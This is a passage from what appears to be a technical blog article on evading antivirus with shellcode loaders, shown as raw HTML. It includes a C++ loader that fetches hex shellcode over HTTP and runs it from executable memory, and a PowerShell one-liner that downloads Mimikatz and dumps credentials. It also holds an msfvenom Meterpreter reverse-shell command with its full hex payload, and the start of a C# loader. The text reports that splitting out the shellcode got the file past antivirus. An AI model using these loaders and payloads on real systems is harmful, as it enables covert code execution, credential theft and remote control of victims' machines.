        &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="n"&gt;string&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"name=host&amp;amp;sign=xx11sad"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ss&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;c_str&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="n"&gt;bResults&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpSendRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const_cast&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ss&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bResults&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;bResults&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpReceiveResponse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bResults&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;do&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// Check for available data.&lt;/span&gt;
            &lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;WinHttpQueryDataAvailable&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Error %u in WinHttpQueryDataAvailable.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Out of memory&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="n"&gt;ZeroMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;WinHttpReadData&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPVOID&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dwDownloaded&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Error %u in WinHttpReadData.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="k"&gt;else&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"ok"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;code_length&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;strlen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;calloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;code_length&lt;/span&gt;  &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;code_length&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
                &lt;span class="n"&gt;sscanf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%2hhx"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
                &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;memcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)())&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;)();&lt;/span&gt;
            &lt;span class="k"&gt;delete&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;dwDownloaded&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;WinHttpCloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;WinHttpCloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;WinHttpCloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"pause"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8b2006bftwz53xqpjurj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8b2006bftwz53xqpjurj.png" alt="Figure 4: HTTP-based shellcode retrieval implementation" width="800" height="524"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 4: HTTP-based shellcode retrieval implementation
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Examining the detection results: after removing the embedded shellcode, Antivirus no longer flags the executable.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fj0g5gy93z2jplzdhxfgg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fj0g5gy93z2jplzdhxfgg.png" alt="Figure 5: Detection results after shellcode separation" width="800" height="268"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 5: Detection results after shellcode separation
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Numerous similar remote-loading techniques exist, such as PowerShell in-memory loading—a method with which many practitioners are undoubtedly familiar.&lt;/p&gt;

&lt;p&gt;For instance, PowerShell can be used to remotely load Mimikatz for credential extraction:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;powershell&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;IEX&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;New-Object&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Net.WebClient&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;DownloadString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Invoke-Mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;c:\1.txt&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fe7wh19kzyccqh3v9v340.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fe7wh19kzyccqh3v9v340.png" alt="Figure 6: PowerShell remote loading example" width="800" height="269"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 6: PowerShell remote loading example
  &lt;p&gt;&lt;/p&gt;




&lt;p&gt;While many such techniques are widely used, certain in-memory loading methods are still intercepted by some antivirus solutions. We shall address this issue later in the article.&lt;/p&gt;

&lt;p&gt;At this juncture, the underlying principle of language-based loaders should be self-evident. Nonetheless, I shall offer an explanation, drawing upon my colleague's analogy:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Shellcode is analogous to water; a loader serves as the vessel that contains it. Just as water must be poured into a cup before it can be consumed, shellcode must be loaded by a loader before it can be executed.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  A) Loaders for Executing Shellcode
&lt;/h3&gt;

&lt;h4&gt;
  
  
  SSI (Shellcode String Injection):
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;--platform&lt;/span&gt; Windows &lt;span class="nt"&gt;-p&lt;/span&gt; windows/meterpreter/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.142 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 &lt;span class="nt"&gt;-f&lt;/span&gt; c &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; msf.txt
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of c file: 1457 bytes
&lt;span class="nb"&gt;cat &lt;/span&gt;msf.txt|grep &lt;span class="nt"&gt;-v&lt;/span&gt; unsigned|sed &lt;span class="s2"&gt;"s/&lt;/span&gt;&lt;span class="se"&gt;\"\\\x&lt;/span&gt;&lt;span class="s2"&gt;//g"&lt;/span&gt;|sed &lt;span class="s2"&gt;"s/&lt;/span&gt;&lt;span class="se"&gt;\\\x&lt;/span&gt;&lt;span class="s2"&gt;//g"&lt;/span&gt;|sed &lt;span class="s2"&gt;"s/&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;//g"&lt;/span&gt;|sed &lt;span class="s1"&gt;':a;N;$!ba;s/\n//g'&lt;/span&gt;|sed &lt;span class="s2"&gt;"s/;//g"&lt;/span&gt;

fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a68c0a8ae84680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fgu0heke688vy7xu64ijn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fgu0heke688vy7xu64ijn.png" alt="Figure 7: MSFVenom shellcode generation output" width="800" height="70"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 7: MSFVenom shellcode generation output
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc8v8o3aieo73v7tkjvkq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc8v8o3aieo73v7tkjvkq.png" alt="Figure 8: SSI loader execution example" width="799" height="267"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 8: SSI loader execution example
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Shellcode Launcher:
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fujm7d3rc9g1i8v7agraz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fujm7d3rc9g1i8v7agraz.png" alt="Figure 9: Shellcode Launcher tool interface" width="800" height="237"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 9: Shellcode Launcher tool interface
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  C# Loader:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight csharp"&gt;&lt;code&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Runtime.InteropServices&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="nn"&gt;TCPMeterpreterProcess&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Program&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;Main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// native function's compiled code&lt;/span&gt;
            &lt;span class="c1"&gt;// generated with metasploit&lt;/span&gt;
            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="m"&gt;333&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;

            &lt;span class="p"&gt;};&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;UInt32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;Marshal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Copy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
